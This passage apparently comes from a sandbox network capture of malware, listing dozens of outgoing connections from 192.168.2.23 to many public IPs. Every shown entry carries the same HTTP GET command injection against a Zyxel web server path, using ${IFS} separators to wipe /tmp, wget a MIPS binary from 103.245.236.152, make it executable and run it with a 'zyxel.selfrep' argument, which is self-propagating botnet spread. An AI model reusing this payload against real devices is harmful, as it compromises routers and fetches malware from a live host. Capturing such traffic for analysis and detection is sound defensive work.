                                            Jan 14, 2024 15:50:25.182281017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            426192.168.2.2337054183.247.2.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182307959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            427192.168.2.2339022137.245.176.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182339907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            428192.168.2.233686653.184.248.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182357073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            429192.168.2.2358846113.1.177.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182396889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            430192.168.2.234468870.19.15.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182432890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            431192.168.2.234382277.246.70.249443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182456017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            432192.168.2.234310414.176.45.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.182485104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            433192.168.2.2337316205.59.169.253443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183208942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            434192.168.2.234477818.183.199.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183228016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            435192.168.2.2344356167.188.200.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183253050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            436192.168.2.2359638136.194.51.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183280945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            437192.168.2.2352004133.234.82.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183280945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            438192.168.2.2348174112.129.92.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183319092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            439192.168.2.2338782216.13.95.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183326006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            440192.168.2.2339046123.124.211.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183391094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            441192.168.2.234268074.134.180.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183423996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            442192.168.2.2358320126.224.254.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183425903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            443192.168.2.2340440129.67.173.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183453083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            444192.168.2.2350446137.10.70.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183466911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            445192.168.2.23335721.140.68.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183542967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            446192.168.2.2339734208.15.60.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183597088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            447192.168.2.233636695.238.193.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183598995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            448192.168.2.235725852.153.233.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183609962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            449192.168.2.236057052.90.170.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183648109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            450192.168.2.2343604181.60.123.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183664083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            451192.168.2.2357778166.169.6.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183725119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            452192.168.2.2350190184.40.207.197443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183737993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            453192.168.2.235259275.176.45.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183762074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            454192.168.2.2339068212.56.6.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183788061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            455192.168.2.2355566101.147.205.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183825970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            456192.168.2.2360356186.225.36.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183855057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            457192.168.2.2357726132.172.105.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183914900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            458192.168.2.2336966172.226.210.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183918953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            459192.168.2.2346668112.168.242.193443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183949947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            460192.168.2.2360590142.65.209.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.183986902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            461192.168.2.233644468.106.37.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184020042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            462192.168.2.2355056112.74.145.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184063911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            463192.168.2.2345204137.213.166.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184097052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            464192.168.2.2345584181.190.244.130443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184129953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            465192.168.2.233682092.163.156.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184161901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            466192.168.2.2357942189.156.239.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184225082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            467192.168.2.235749412.124.91.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184235096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            468192.168.2.2357952108.170.20.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184281111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            469192.168.2.2334376206.223.161.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184295893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            470192.168.2.2349872132.11.169.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184324980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            471192.168.2.2355458192.175.54.221443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184345007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            472192.168.2.2332980186.170.182.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184379101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            473192.168.2.236055090.255.120.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184408903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            474192.168.2.2340758219.156.27.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184441090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            475192.168.2.234404662.176.130.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184465885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            476192.168.2.2360256132.104.234.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184475899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            477192.168.2.233742666.181.200.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184498072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            478192.168.2.233524892.230.173.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184531927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            479192.168.2.235340054.180.5.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184587002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            480192.168.2.2345816143.127.136.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184624910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            481192.168.2.2336544126.62.163.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184637070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            482192.168.2.234234617.207.100.176443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184674025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            483192.168.2.234636832.133.227.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184711933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            484192.168.2.2343646212.254.157.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184727907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            485192.168.2.2341648163.253.138.63443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184768915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            486192.168.2.234645465.143.63.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184786081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            487192.168.2.2360294158.56.236.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:25.184813023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            488192.168.2.233634066.183.119.94443
                                            TimestampBytes transferredDirectionData
